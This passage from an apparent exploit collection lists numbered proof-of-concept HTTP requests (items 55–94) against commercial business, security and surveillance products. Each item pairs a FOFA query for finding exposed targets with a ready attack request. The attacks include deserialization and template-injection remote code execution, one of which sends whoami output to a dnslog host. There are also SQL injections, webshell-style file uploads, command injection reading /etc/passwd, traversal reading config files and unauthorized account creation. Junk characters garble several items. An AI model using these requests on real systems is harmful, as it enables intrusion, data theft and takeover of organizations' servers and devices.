      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword interface
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

5 ~% y+ t4 O+ M4 c( ?8 z+ U56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
3 D4 q" x8 E" ~6 e/ ^FOFA: app="畅捷通-TPlus"
; V1 G8 I1 v* q. R) C9 z$ JPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
" E, W! ?' c0 J) D: WHost: x.x.x.x
! e# V- D. i* A* rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
$ @" j% B7 G6 W$ `Content-Type: application/json
( ~9 E1 z  @% N+ E
. s) I* y; e& G! X{6 g4 f0 ^3 z: u! w! H" ?  g- e2 B
  "storeID":{
" a8 A5 S( d$ ?' _, @* e    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",( o3 S. F1 c8 s4 N& y, c5 S
   "MethodName":"Start",% ]; Z' p- s: t. ]) S+ F$ X) E
    "ObjectInstance":{# U! o' l  y* R8 V$ P9 [
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"," {3 q8 L$ A  z* P
        "StartInfo": {- n, t% z! s$ }0 q, a6 }: K' i; A
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"," T' z+ a& ?  b; b
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw", J& ^8 o$ \5 m7 i4 h
       }
* h) n6 n  w4 C7 ~! _    }% z2 Z; @  i! ]# g
  }
% x& ^+ u! \( p1 Y. V) l}7 Z( ?; n! @7 X/ v2 D

5 I9 }3 G+ P$ U: ^  F
57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通 T+ KeyInfoList.aspx SQL injection
FOFA: app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, the dir parameter gives the path it is written to, and the fileType parameter gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password leak
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is shown below; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 comprehensive security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

; D; k, X* o. b/ N5 j92. 海康威视运行管理中心session命令执行. q% I0 b3 b9 ^! l* n
Fastjson命令执行
: }% z4 z/ ]4 Z/ S8 Z' vhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
1 p( b# Q6 _* I. sPOST /center/api/session HTTP/1.16 N, I5 e9 b' W
Host:
! \: w/ f. c# o: J( [% Y# OAccept: application/json, text/plain, */** r+ l5 w7 t4 ~9 _4 M
Accept-Encoding: gzip, deflate# S; _  J$ d3 c( w" \/ N0 B' U
X-Requested-With: XMLHttpRequest
" d/ J0 j& }; V0 V2 I+ BContent-Type: application/json;charset=UTF-8
6 i% K$ C$ s4 |& o) A, jX-Language-Type: zh_CN/ T6 U5 O7 @1 o) n
Testcmd: echo test4 @1 ^0 v. r1 @( }, @9 n5 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36( e- D  F, q) @0 s' O7 n3 m
Accept-Language: zh-CN,zh;q=0.9
2 ]" b1 P* X8 n& r, bContent-Length: 5778% @5 C8 ~. Y2 l1 ?3 X
0 X0 M) ?7 ^$ S/ s/ F
PAYLOAD
% A) U- `% a2 [6 R* Z, S4 i* Z0 D8 l! v# X: |6 v; n

93. 奇安信 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

